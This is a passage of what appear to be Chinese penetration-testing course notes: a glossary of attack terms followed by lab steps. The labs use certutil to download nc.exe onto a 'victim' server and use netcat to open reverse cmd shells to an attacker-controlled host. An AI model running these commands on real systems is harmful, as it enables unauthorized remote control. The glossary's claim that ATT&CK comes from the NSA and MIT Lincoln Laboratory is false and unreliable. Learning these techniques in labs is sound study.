[BT]小迪安全2023学习笔记（第1天：操作系统）

第1天

概念解释

1. POC(Proof of Concept)：PoC 是用来证明某个安全漏洞确实存在的代码或演示。它通常只是展示漏洞可以被利用的潜力，并不用于实际的攻击

2. Exp (Exploit)：Exploit 是一段代码或程序，它利用了软件中的安全漏洞来执行攻击者的命令。与 PoC 不同，Exploit 是用于实际攻击的，可以用来盗取数据、控制系统等。

3. Payload（有效载荷）：Payload 是在网络攻击中传输并执行的数据或代码。它用于执行攻击者指定的操作，如窃取数据、破坏系统或控制被攻击的设备。

4. Shellcode（壳代码）：Shellcode 是一种特殊的 Payload。它是一小段代码，用于在成功利用漏洞后在目标系统上打开命令行接口（shell）。Shellcode 通常用于直接控制受影响的系统。

5. 后门（Backdoor）：一个隐藏入口，允许用户或程序绕过正常的安全检查，直接访问计算机系统或网络。它可以被系统的创建者、管理员或黑客设置。后门常用于远程控制、监视或窃取数据。

6. Webshell：一种放置在网络服务器上的恶意脚本，使攻击者能够通过网络远程控制服务器。它通常以网页文件（如PHP、ASP）的形式存在。一旦部署，攻击者可以通过Webshell执行命令、管理文件或进一步渗透网络。

7. 反弹（Reverse Shell）：反弹是一种网络攻击技术，其中受攻击的系统主动连接到攻击者的计算机。这种技术常用于绕过防火墙，因为连接是由受害者系统向外发起的。通过这种方式，攻击者可以远程控制受攻击的系统。

8. 回显（Shell）：回显通常指在攻击中获得的命令行访问权限。当攻击者成功利用某个漏洞后，他们可能会得到一个回显，即能够执行命令和控制受害者的系统。这种回显可以是直接的（比如通过直接连接）或反弹的（即反弹回显）。

9. 跳板（Pivot）：指的是攻击者利用已经控制的系统作为一个中转点，来攻击同一网络内的其他系统。这样做可以帮助攻击者访问难以直接到达的网络区域，或者进一步深入目标网络。

10. 黑白盒测试（Black Box and White Box Testing）：黑白盒测试是一种软件测试方法，黑盒测试中测试人员不了解内部结构或实现细节的情况下测试应用程序。他们只关注输入和输出，验证应用程序的功能是否符合要求。而白盒测试中测试人员需要了解程序的内部结构和逻辑。在这种方法中，测试人员不仅测试应用程序的接口，还检查内部代码工作是否正确。简单来说，黑盒测试关注于软件的功能和外部表现，而白盒测试则深入到软件的内部逻辑和代码结构。

11. 暴力破解（Brute Force Attack）：暴力破解是一种破解密码的方法，通过尝试所有可能的密码组合来猜测正确的密码。这种方法不需要事先了解任何有关密码的信息。

12. 撞库（Credential Stuffing）：撞库是一种网络攻击方法，攻击者使用从其他网站泄露的用户名和密码组合，尝试登录到不同的网站。因为许多用户在不同的网站使用相同的登录凭证，这种方法有时会成功。

13. ATT&CK ："ATT&CK"是由美国国家安全局（NSA）和麻省理工学院林肯实验室共同开发的一种网络攻击知识框架。全称是“Adversarial Tactics, Techniques, and Common Knowledge”，意为“敌对策略、技术与共知”。主要用途包括：

    • 描述网络攻击者的行为模式：ATT&CK框架详细列出了网络攻击者可能采取的各种策略和技术，从初始访问到最终目标的实现。
    • 安全防御和风险评估：安全专家使用ATT&CK框架来识别和防御网络攻击，通过了解攻击者的常用方法，可以更有效地防范潜在的威胁。
    • 培训和教育：作为一个公开的知识库，ATT&CK为网络安全教育和专业人员的培训提供了一个重要资源。
    • 总的来说，ATT&CK框架为理解和应对网络攻击提供了一套详细的方法和知识体系，被广泛应用于网络安全的各个领域。

操作系统

文件上传下载（命令操作）

借助下面的网站生成对应的命令进行操作，相对简单。
常用命令工具网站：https://forum.ywhack.com/bountytips.php

实验1：内外网（外放cmd权限）

操作对象：本地虚拟机，远程服务器

操作内容：将本地虚拟机的cmd权限外放给远程服务器，并且将远程服务器的cmd权限外放给本地虚拟机。

操作结果：本地虚拟机cmd权限可以交给远程服务器，因为能够找到外网远程服务器ip地址，而远程服务器cmd权限无法交给本地虚拟机，因为无法确定内网本地虚拟机ip地址。

操作过程：此处仅举本地虚拟机cmd权限交给远程服务器的例子。

1. 远程服务器终端： nc -lvvp 5577
   在远程服务器上监听5577端口。

2. 本地虚拟机：nc -e cmd 远程服务器ip 5577
   允许远程服务器使用本地虚拟机的cmd程序。

注意：cmd程序位于根目录下，因此需要先切换到根目录再进行连接。

实验2：正反向连接（防火墙）

操作对象：远程服务器A（开启防火墙），远程服务器B

操作内容：将远程服务器B的cmd权限外放给远程服务器A，并且将远程服务器A的cmd权限外放给远程服务器B。

操作结果：远程服务器B的cmd权限无法交给远程服务器A，因为A开启防火墙阻止连接，而远程服务器A的cmd权限可以交给远程服务器B，因为B未开防火墙不会阻止连接。

实验意义：防火墙规则入站严格，出站宽松。当要渗透的远程服务器有防火墙无法让我们主动连接它的时候（正向连接），考虑让远程服务器主动连接我们（反向连接）。

案例：

操作对象：自己的远程服务器，受害远程服务器

操作内容：将自己远程服务器上的nc.exe下载到受害服务器上，并且将执行受害服务器上下载好的nc.exe反向连接到自己的服务器。

操作结果：连接后可以执行cmd命令。

操作过程：

1. 受害远程服务器：certutil.exe -urlcache -split -f http://自己的远程服务器域名：端口//nc.exe n.exe
   在受害服务器上下载好nc.exe并且重命名为n.exe。
2. 自己的远程服务器：nc -lvvp 5577
3. 受害远程服务器：nc -e cmd 自己的远程服务器ip 5577
4. 接下来就可以按自己的需求执行一些命令了